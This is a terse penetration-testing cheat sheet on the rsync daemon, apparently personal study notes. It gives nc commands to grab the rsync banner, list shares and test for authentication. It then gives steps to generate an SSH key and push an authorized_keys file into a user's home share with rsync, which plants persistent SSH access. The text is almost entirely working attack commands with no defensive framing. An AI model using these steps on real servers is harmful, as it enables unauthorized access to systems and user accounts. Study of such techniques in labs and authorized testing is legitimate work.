nc -nv <ip> 873
@RSYNCD: <ver> you will receive a banner with the version, send back the same string to complete the login
#list list all available shared folders
<folder name> test if a folder requires authentication: if the server returns AUTHREQD a password is required
Useful if the shared folder is the home of some user
mkdir ./.ssh
cd .ssh
ssh-keygen #remember to set the destination to ./.ssh instead of the default one
cat id_rsa.pub > authorized_keys
cd ..
rsync -av ./.ssh rsync://<ip>/<share>